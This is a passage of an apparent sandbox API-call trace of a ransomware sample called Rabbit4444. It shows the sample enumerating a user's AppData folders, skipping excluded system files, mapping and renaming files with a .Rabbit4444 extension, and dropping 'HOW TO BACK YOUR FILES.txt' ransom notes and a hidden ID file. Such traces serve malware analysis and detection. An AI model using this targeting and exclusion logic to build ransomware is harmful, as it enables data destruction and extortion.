cAlternateFileName="")) returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0065.235] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0065.235] lstrcpyW (in: lpString1=0x130ec08, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0065.236] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0065.236] lstrlenW (lpString="settings.dat") returned 12 [0065.236] lstrlenW (lpString="Rabbit4444") returned 10 [0065.236] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0065.236] lstrlenW (lpString=".dll") returned 4 [0065.237] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0065.237] lstrlenW (lpString=".lnk") returned 4 [0065.237] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0065.237] lstrlenW (lpString=".ini") returned 4 [0065.237] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0065.237] lstrlenW (lpString=".sys") returned 4 [0065.237] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0065.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.237] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.237] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15654783117) returned 1 [0065.237] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0065.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0065.237] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.238] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11de60 [0065.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0065.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0065.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11de60 [0065.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0065.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0065.240] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15655117934) returned 1 [0065.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0065.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0065.241] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.241] CloseHandle (hObject=0x27c) returned 1 [0065.241] CloseHandle (hObject=0x2cc) returned 1 [0065.241] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 127 [0065.241] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0065.242] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd95f389a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd95f389a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd95f389a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0065.242] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0065.242] lstrcpyW (in: lpString1=0x130ec08, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0065.242] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0065.243] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0065.243] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0065.243] lstrlenW (lpString="Rabbit4444") returned 10 [0065.243] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0065.243] lstrlenW (lpString=".dll") returned 4 [0065.244] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0065.244] lstrlenW (lpString=".lnk") returned 4 [0065.244] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0065.244] lstrlenW (lpString=".ini") returned 4 [0065.244] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0065.244] lstrlenW (lpString=".sys") returned 4 [0065.244] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0065.244] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.244] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.244] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15655482741) returned 1 [0065.244] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0065.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0065.244] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.245] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11de60 [0065.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0065.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11de60 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0065.247] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15655787681) returned 1 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0065.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0065.247] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.248] CloseHandle (hObject=0x27c) returned 1 [0065.248] CloseHandle (hObject=0x2cc) returned 1 [0065.248] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 132 [0065.248] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0065.249] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd95f389a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd95f389a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd95f389a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0065.249] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0065.249] lstrcpyW (in: lpString1=0x130ec08, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0065.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0065.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0065.249] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0065.249] lstrlenW (lpString="Rabbit4444") returned 10 [0065.249] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0065.249] lstrlenW (lpString=".dll") returned 4 [0065.249] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0065.249] lstrlenW (lpString=".lnk") returned 4 [0065.249] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0065.250] lstrlenW (lpString=".ini") returned 4 [0065.250] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0065.250] lstrlenW (lpString=".sys") returned 4 [0065.250] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0065.250] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd95f389a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd95f389a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd95f389a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0065.250] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0065.250] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.250] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.250] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.251] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.251] CloseHandle (hObject=0x2cc) returned 1 [0065.251] CloseHandle (hObject=0x2a0) returned 1 [0065.252] GetCurrentThreadId () returned 0xd98 [0065.252] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0065.252] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState" [0065.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0065.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0065.252] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState" [0065.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\" [0065.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0065.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.253] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.256] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.256] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.257] CloseHandle (hObject=0x2a0) returned 1 [0065.257] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState") returned 107 [0065.257] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.257] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10816d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.257] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.257] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.257] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.257] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.257] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10816d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.257] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.257] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.257] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.258] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf037ef13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf037ef13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.258] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf037ef13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf037ef13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.258] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.258] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.259] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.259] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.260] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.260] CloseHandle (hObject=0x2cc) returned 1 [0065.260] CloseHandle (hObject=0x2a0) returned 1 [0065.260] GetCurrentThreadId () returned 0xd98 [0065.260] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0065.260] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState" [0065.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c068 | out: hHeap=0xe0000) returned 1 [0065.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0065.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState" [0065.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\" [0065.260] lstrcatW (in: 